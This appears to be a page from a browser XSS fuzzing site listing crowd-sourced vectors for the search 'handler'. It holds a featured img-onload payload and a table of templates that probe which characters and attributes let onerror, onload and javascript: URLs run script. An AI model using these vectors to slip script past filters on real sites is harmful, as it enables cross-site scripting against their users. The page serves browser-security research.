Featured vector
Default Browser 0.0
<!-- sample vector --> <img src=//lel0x2ewtf/hey.jpg onload=alert(1)>
<!-- sample vector --> <img src=//lel0x2ewtf/hey.jpg onload=alert(1)>
Fuzz vector cloud
Anchor Attributes CSS Closing Comments HTML HTML5 JavaScript Property Protocol Script URL XSS attribute bla bypass challenge char comment data encoding entities entity event events expression flash for fun handler href img innerHTML navigateURL onload prompt properties regex space src string style svg tag tags test testing uri vbscript xml
3,403,239 Successful fuzzes
Fuzz Vectors
Searching for "handler"
Your browser identified asGeneral Crawlers unknown
All vectors
| Description | Vector | Created by |
|---|---|---|
| Valid characters in on____ event handler attributes | <img src on*chr*error=logChr(*num*)> | @Lamp_Sec |
| Characters allowed between event handlers and equal sign | <img src="about:blank" onerror*chr*=logChr(*num*)> | @peksa |
| HTML input image tag attributes that run JavaScript | <input *datahtmlattributes*="customLog('*datahtmlattributes*')" type="image" src="about:blank"> | @peksa |
| HTML input tag attributes that run JavaScript | <input *datahtmlattributes*="customLog('*datahtmlattributes*')" type="text"> | @peksa |
| Characters that dont inhibit eventhandlers | <img src=xx:xx o*chr*nerror=logChr(*num*)> | @tifkin_ |
| html dataentities before event handler | <img src="x" asdf/="_=" alt=" *dataentities*onerror=logChr(*num*) //"> | @testacc40590139 |
| Determine what character can be at the end of the javascript but before the colon | <!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)> <a href=javascript*chr*:alert(*num*)>*num*</a> | @MisterJyu |
| Characters ignored in html event handler name | <img src=x on*chr*Error="javascript:log(*num*)"/> | @mhswende |